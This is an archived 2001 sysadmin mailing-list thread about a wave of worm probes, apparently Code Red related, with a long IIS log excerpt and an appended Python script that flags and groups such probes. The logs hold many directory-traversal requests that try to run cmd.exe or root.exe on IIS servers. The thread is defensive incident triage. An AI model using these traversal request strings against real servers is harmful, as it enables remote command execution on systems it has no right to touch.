Looks like the same old Code Red to me.

> -----Original Message-----
> From: Randal, Phil [mailto:[EMAIL PROTECTED]]
> Sent: Tuesday, September 18, 2001 11:23 AM
> To: NT System Admin Issues
> Subject: RE: WARNING: Hacker Alert
>
>
> Looks like a new worm to me.  Probably planted on all those
> Code Red compromised servers :-(
>
> Phil
>
> ---------------------------------------------
> Phil Randal
> Network Engineer
> Herefordshire Council
> Hereford, UK
>
> > -----Original Message-----
> > From: Jason Morris [mailto:[EMAIL PROTECTED]]
> > Sent: 18 September 2001 15:59
> > To: NT System Admin Issues
> > Subject: RE: WARNING: Hacker Alert
> >
> >
> > CodeRed seems to have dwindled to nothing on my logs. But it's being
> > replaced with the EXACT same lines you have below, and they stay
> > consistent with the Code Red 2 methods of attacking the more local subnets.
> >
> > Jason Morris CCDA CCNP
> > Network Administrator
> > MJMC, Inc.
> > 708-225-2350
> > [EMAIL PROTECTED]
> >
> >
> > -----Original Message-----
> > From: Jason Morris [mailto:[EMAIL PROTECTED]]
> > Sent: Tuesday, September 18, 2001 9:50 AM
> > To: NT System Admin Issues
> > Cc: '[EMAIL PROTECTED]'
> > Subject: RE: WARNING: Hacker Alert
> >
> >
> > Yes. It seems to be systems I have previously monitored hitting me with
> > Code Red attacks. I bet someone is activating all of their children.
> >
> > Jason Morris CCDA CCNP
> > Network Administrator
> > MJMC, Inc.
> > 708-225-2350
> > [EMAIL PROTECTED]
> >
> >
> > -----Original Message-----
> > From: xylog [mailto:[EMAIL PROTECTED]]
> > Sent: Tuesday, September 18, 2001 9:45 AM
> > To: NT System Admin Issues
> > Subject: WARNING: Hacker Alert
> >
> >
> > All my public facing web servers at home and at my office have shown a
> > huge continuous hacking activity. Has anyone seen similar? I fear this
> > may be code red related or automated. Please comment if you have seen
> > similar. Here is an excerpt from one logfile:
> >
> > 63.101.9.107, -, 9/18/01, 10:36:21, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145, 0, 500, 87, GET, /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe, /c+dir,
> > 63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /scripts/..�../winnt/system32/cmd.exe, /c+dir,
> > 63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir,
> > 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
> > 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
> > 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
> > 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
> > 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
> > 63.101.9.107, -, 9/18/01, 10:36:33, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+dir,
> > 64.156.252.27, -, 9/18/01, 10:36:42, W3SVC4, DC1DIIS01, x.x.x.x, 156, 41, 13975, 200, 0, GET, /mpf-flow/flow/login.cfm, -,
> > 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 72, 604, 404, 3, GET, /scripts/root.exe, /c+dir,
> > 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 70, 604, 404, 3, GET, /MSADC/root.exe, /c+dir,
> > 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir,
> > 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 15, 80, 604, 404, 3, GET, /d/winnt/system32/cmd.exe, /c+dir,
> > 63.101.171.231, -, 9/18/01, 10:37:06, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
> > 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
> > 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
> > 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145, 0, 500, 87, GET, /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe, /c+dir,
> > 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 15, 97, 604, 404, 3, GET, /scripts/..�../winnt/system32/cmd.exe, /c+dir,
> > 64.156.252.27, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 156, 41, 13975, 200, 0, GET, /mpf-flow/flow/login.cfm, -,
> > 63.101.171.231, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97, 604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir,
> > 63.101.171.231, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
> > 63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
> > 63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
> > 63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
> > 63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
> > 63.101.171.231, -, 9/18/01, 10:37:17, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+dir,
> > 63.230.208.17, -, 9/18/01, 10:37:21, W3SVC4, DC1DIIS01, x.x.x.x, 0, 72, 604, 404, 3, GET, /scripts/root.exe, /c+dir,
> > 63.230.208.17, -, 9/18/01, 10:37:22, W3SVC4, DC1DIIS01, x.x.x.x, 0, 70, 604, 404, 3, GET, /MSADC/root.exe, /c+dir,
> > 63.230.208.17, -, 9/18/01, 10:37:24, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir,
> > 63.230.208.17, -, 9/18/01, 10:37:26, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET, /d/winnt/system32/cmd.exe, /c+dir,
> > 63.230.208.17, -, 9/18/01, 10:37:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
> > 63.230.208.17, -, 9/18/01, 10:37:34, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
> > 63.230.208.17, -, 9/18/01, 10:37:36, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
> > 63.230.208.17, -, 9/18/01, 10:37:42, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145, 0, 500, 87, GET, /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe, /c+dir,
> > 63.114.34.130, -, 9/18/01, 10:39:37, W3SVC4, DC1DIIS01, x.x.x.x, 0, 72, 604, 404, 3, GET, /scripts/root.exe, /c+dir,
> > 63.114.34.130, -, 9/18/01, 10:39:37, W3SVC4, DC1DIIS01, x.x.x.x, 0, 70, 604, 404, 3, GET, /MSADC/root.exe, /c+dir,
> > 63.114.34.130, -, 9/18/01, 10:39:37, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir,
> > 63.114.34.130, -, 9/18/01, 10:39:38, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET, /d/winnt/system32/cmd.exe, /c+dir,
> > 63.114.34.130, -, 9/18/01, 10:39:38, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
> > 63.114.34.130, -, 9/18/01, 10:39:38, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
> > 63.114.34.130, -, 9/18/01, 10:39:39, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
> > 63.114.34.130, -, 9/18/01, 10:39:39, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145, 0, 500, 87, GET, /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe, /c+dir,
> > 63.114.34.130, -, 9/18/01, 10:39:39, W3SVC4, DC1DIIS01, x.x.x.x, 15, 97, 604, 404, 3, GET, /scripts/..�../winnt/system32/cmd.exe, /c+dir,
> > 63.114.34.130, -, 9/18/01, 10:39:41, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97, 604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir,
> > 63.114.34.130, -, 9/18/01, 10:39:44, W3SVC4, DC1DIIS01, x.x.x.x, 15, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
> > 63.114.34.130, -, 9/18/01, 10:39:44, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
> > 63.114.34.130, -, 9/18/01, 10:39:44, W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
> > 64.156.252.27, -, 9/18/01, 10:39:45, W3SVC4, DC1DIIS01, x.x.x.x, 172, 41, 13973, 200, 0, GET, /mpf-flow/flow/login.cfm, -,
> > 63.114.34.130, -, 9/18/01, 10:39:45, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
> > 63.114.34.130, -, 9/18/01, 10:39:45, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
> > 63.114.34.130, -, 9/18/01, 10:39:47, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+dir,
> >
> >
> >
> > http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
> > Confidential:  This e-mail and any files transmitted with it are the
> > property of Lanco International and/or its affiliates, are
> > confidential, and
> > are intended solely for the use of the individual or entity
> > to whom this
> > e-mail is addressed. If you are not one of the named recipient(s) or
> > otherwise have reason to believe that you have received this
> > message in
> > error, please notify the sender at the above e-mail address
> > and delete this
> > message immediately from your computer.  Any other use, retention,
> > dissemination, forwarding, printing or copying of this e-mail
> > is strictly
> > prohibited.



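A log-triage script for the probe pattern the thread describes, added here as an example and not something any list member posted: it parses lines in the native IIS log format of the excerpt (field order assumed from that excerpt), decodes the %5c / %2f / %255c traversal encodings, groups the root.exe and cmd.exe probes by source address, and flags any the server answered with 200 rather than the 404/500 seen above. The sample lines are constructed from the excerpt.

```python
from collections import defaultdict
from urllib.parse import unquote

# Field order of the native IIS log format, as assumed from the excerpt above.
FIELDS = ["client_ip", "user", "date", "time", "service", "server", "server_ip",
          "time_taken", "client_bytes", "server_bytes", "status", "win32_status",
          "method", "uri_stem", "uri_query"]

# Constructed sample, modelled on the excerpt (server IP masked the same way).
SAMPLE_LOG = """\
63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /scripts/root.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
64.156.252.27, -, 9/18/01, 10:36:42, W3SVC4, DC1DIIS01, x.x.x.x, 156, 41, 13975, 200, 0, GET, /mpf-flow/flow/login.cfm, -,
63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
"""

def parse_line(line):
    """Split one native-format IIS line into a dict; None if the field count is off."""
    parts = [p.strip() for p in line.strip().rstrip(",").split(",")]
    return dict(zip(FIELDS, parts)) if len(parts) == len(FIELDS) else None

def decode_path(path):
    """Percent-decode until stable (catches %255c double encoding), fold '\\' to '/'."""
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/").lower()

def classify(entry):
    """Reasons this request matches the worm probe pattern in the excerpt, if any."""
    path = decode_path(entry["uri_stem"])
    reasons = []
    if path.endswith("/root.exe"):
        reasons.append("root.exe: Code Red II backdoor copy of cmd.exe")
    if "cmd.exe" in path:
        reasons.append("cmd.exe requested over HTTP")
    if "/../" in path:
        reasons.append("directory traversal after decoding")
    return reasons

def scan(log_text):
    """Group suspicious requests by client IP and note whether each probe succeeded."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry and (reasons := classify(entry)):
            # 404 (win32 3, path not found) and 500 (win32 87) mean the probe failed;
            # a 200 on one of these URIs would mean cmd.exe actually ran: escalate.
            outcome = "SUCCEEDED-INVESTIGATE" if entry["status"] == "200" else "failed"
            hits[entry["client_ip"]].append((entry["time"], entry["status"], outcome, reasons))
    return dict(hits)
```

Run `scan(SAMPLE_LOG)` to get the per-source list of probes; the benign login.cfm request is not reported.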